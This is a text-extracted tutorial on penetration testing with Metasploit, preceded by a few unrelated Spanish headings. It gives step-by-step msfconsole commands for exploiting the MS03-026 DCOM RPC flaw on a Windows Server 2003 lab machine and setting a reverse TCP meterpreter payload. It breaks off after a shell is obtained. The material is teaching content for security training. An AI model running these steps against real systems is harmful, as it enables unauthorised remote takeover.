• No se han encontrado resultados

5. Actividades precedentes que sirven de núcleo al futuro instituto: Méritos docentes

5.3. Docencia en máster

You can narrow your search to display only spe-cific module by using command

• msf>show exploits – exploits operate against the vulnerabilities that you discover during a penetration test. New exploits are always be-ing developed, and the list will continue to grow. This command will display every current-ly available exploit within the Framework.

• msf>show auxiliary – Auxiliary modules in Metasploit can be used for a wide range of purposes. They can operate as scanners, de-nial-of-service modules, fuzzers, and much more. This command will display them and list their features.

Now after searching, to use a particular module from the framework you need use command

• msf>use ‘name of the exploits’ and to change module just use back

When the module from the metasploit framework is selected, by running the command show op-tions metasploit will display only the option that apply to that particular module.

When no modules set to use show option com-mand will display the global options, example: set LogLevel to be more verbose to perform attack.

The module in metasploit framework needs the

“options for that module” to be set.

To set the options for particular module you need to use the set or unset commands and you can also use setg and unsetg commands to set or un-set a parameter globally within msfconsole. Using these commands can save you from having to re-enter the same information repeatedly, particularly in the case of frequently used options that rarely change, such as LHOST but you need to save all the setting using save command.

Some modules often list vulnerable targets as some vulnerability targetsrelies on harcoded mem-ory address, the exploits are specific on operat-ing system and specific patch levels, version and security implementations using show targets com-mand list the exploits targets. Now everything is done it needs payloads which are platform-specific

portions of code delivered to a target. A payloads can be as simple as command prompt or as com-plex as a graphical interface on the target machine.

To see active list of payloads in a module use

msf> show payloads

Pentesting with metasploit

Metasploit

Here is the demonstration of pen testing a vulner-able target system using

Victim Machine

OS: Microsoft Windows Server 2003 IP: “*”

Attacker (Our) Machine OS: Backtrack 5

GNU/Linux IP: “*”

Our objective here is to gain remote access to given target which is known to be running vulner-able Windows 2003 Server. Here are the detailed steps of our attack in action:

Step 1

Perform an Nmap scan of the remote server ‘IP’.

The output of the Nmap scan shows us a range of ports open which can be seen below in Figure 2:

We notice that there is port 135 open. Thus we can look for scripts in Metasploit to exploit and gain shell access if this server is vulnerable.

Figure 2. Open ports

Figure 3. Locate the console

Step 2

Now on your BackTrack launch msfconsole as shown below:

Application > BackTrack > Exploitation Tools >

Network Exploit Tools > Metasploit Framework >

msfconsole (Figure 3).

During the initialization of msfconsole, standard checks are performed. If everything works out fine we will see the welcome screen as shown: Figure 4.

Step 3

Now, we know that port 135 is open so, we search for a related RPC exploit in Metasploit.

To list out all the exploits supported by Metasploit we use the “show exploits” command. This exploit lists out all the currently available exploits and a small portion of it is shown Figure 5.

As you may have noticed, the default installa-tion of the Metasploit Framework 3.8.0-dev comes with 696 exploits and 224 payloads, which is quite an impressive stockpile thus finding a spe-cific exploit from this huge list would be a real te-dious task. So, we use a better option. You can either visit the link http://metasploit.com/modules/

or another alternative would be to use the “search

<keyword>””command in Metasploit to search for

related exploits for RPC command in Metasploit.

In msfconsole type “search dcerpc” to search all the exploits related to dcerpc keyword as that ex-ploit can be used to gain access to the server with a vulnerable port 135. A list of all the related ex-ploits would be presented on the msfconsole win-dow and this is shown in Figure 6.

Step 4

Now that you have the list of RPC exploits in front of you, we would need more information about the exploit before we actually use it. To get more infor-mation regarding the exploit you can use the com-mand:

“info exploit/windows/dcerpc/ms03_026_dcom”

This command provides information such as avail-able targets, exploit requirements, details of vulner-ability itself, and even references where you can find more information. This is shown in Figure 7.

Step 5

The command “use <exploit_name>” activates the exploit environment for the exploit <exploit_

name>. In our case we will use the following com-mand to activate our exploit

Figure 6. Related exploits

Figure 5. Available exploits Figure 4. Welcome screen

Figure 7. Targets, Exploit requirements, Vulnerabilities, References

EXPLOITING WITH METASPLOIT

“use exploit/windows/dcerpc/ms03_026_dcom”

From the above figure we can see that, after the use of the exploit command the prompt changes from “msf>” to “msf exploit(ms03_026_dcom) >”

which symbolizes that we have entered a tempo-rary environment of that exploit (Figure 8).

Step 6

Now, we need to configure the exploit as per the need of the current scenario. The “show options”

command displays the various parameters which are required for the exploit to be launched prop-erly. In our case, the RPORT is already set to 135 and the only option to be set is RHOST which can be set using the “set RHOST” command.

We enter the command “set RHOST IP” and we see that the RHOST is set to IP (Figure 9).

Step 7

The only step remaining now before we launch the exploit is setting the payload for the exploit.

We can view all the available payloads using the

“show payloads” command.

As shown in the below figure, “show payloads”

command will list all payloads that are compatible with the selected exploit (Figure 10).

For our case, we are using the reverse tcp me-terpreter which can be set using the command,

“set PAYLOAD windows/meterpreter/reverse_

tcp” which spawns a shell if the remote server is successfully exploited. Now again you must view the available options using “show options” to make sure all the compulsory sections are prop-erly filled so that the exploit is launched propprop-erly (Figure 11).

We notice that the LHOST for out payload is not set, so we set it to out local IP ie. IP using the com-mand “set LHOST IP”

Step 8

Now that everything is ready and the exploit has been configured properly its time to launch the exploit.

You can use the “check” command to check whether the victim machine is vulnerable to the ex-ploit or not. This option is not present for all the exploits but can be a real good support system be-fore you actually exploit the remote server to make sure the remote server is not patched against the exploit you are trying against it.

In out case as shown in the figure below, our se-lected exploit does not support the check option (Figure 12).

The “exploit” command actually launches the at-tack, doing whatever it needs to do to have the pay-load executed on the remote system (Figure 13).

The above figure shows that the exploit was suc-cessfully executed against the remote machine 192.168.42.129 due to the vulnerable port 135.

This is indicated by change in prompt to “meter-preter >”.

Step 9

Now that a reverse connection has been setup be-tween the victim and our machine, we have com-plete control of the server. We can use the “help”

Figure 9. RHOST set to IP Figure 11. Show options

Figure 10. Show payloads

Figure 8. The environment if the exploit

command to see which all commands can be used by us on the remote server to perform the related actions as displayed in the Figure 14.

Below are the results of some of the meterpreter